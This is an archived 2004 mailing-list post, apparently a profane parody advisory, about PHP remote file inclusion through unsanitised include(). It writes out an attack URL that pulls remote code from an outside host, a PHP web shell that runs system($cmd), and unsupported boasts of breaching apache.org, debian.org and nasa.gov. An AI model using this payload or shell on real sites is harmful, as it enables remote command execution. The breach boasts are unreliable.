[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <20040703064055.777df313.frogman@bonbon.net>
From: frogman at bonbon.net (Frog M@n)
Subject: VERY HIGH VULNERABILITY DISCLOSURE !!! MASS ROOT POSSIBLE !!!
PLEASE BE ATTENTIVE !!!
This is IHCTEAM material. We fuck blackhats and we own the planet.
This is a leet advisory, s0 l33t. Just read it and be quiet.
---------------------------
IHC TEAM private work, all the fame become to IHC TEAM and the leetest mr. Frog-m@n !!!!
Product: PHP
Version: all
Security level: Very high baby !!!
What's the fuck about:
======================
There is a BIGBUG in all php versions, in the include() function.
If this function is badly used, a roxor hax0r (like us) can compromise
a box remotely. He can execute commands with apache rights.
Example:
www.fuck-teso.com/index.php?page=whitehats.php
index.php:
...
include($page); // <--- fucking lame
...
So, you don't know, but there is a BIGBUG. You can include a remote page, that contains
php code, that will be executed on the fuck-teso server:
www.fuck-teso.com/index.php?page=http://www.ihcteam.com/we-own-teso.txt?cmd=ls%20/tmp
It will give you this result:
suckit.tar.gz do_brk.c adore.tar.gz hello_world.c
So, do you understand what I mean ?
What contains we-own-teso.txt ?
just:
<?
system("$cmd");
?>
Patch:
=====
Don't use the include() function, it is coded by idiots, like THEO@...nbsd.
This is so stupid, that we think that this function is maybe a backdoor
from THC.org, the uberh4x0r team very very very leet, that code fucking lame
brute forcers.
Hey guys, you can be hax0red with google, so don't reference your site on google.
Fame:
====
We owned everything and everywhere with this exploit:
www.apache.org
www.debian.org
www.nasa.gov
Is was very funny to read .mil files.
ATTENTION !!!
WE ARE LOOKING FOR A JOB IN THE SECURITY RESEARCH
PLEASE CONTACT US RIGHT NOW :
karl@...team.org
capashen@...ionet.net
frog-man@...secure.org
---------------------------
We n33d f4me, m0n3y, g1rls and m0nk3ys, so VIVA EL DISCLOSURO.
$$$ ??? ??? <--- this is security corps' spirit :)
Powered by blists - more mailing lists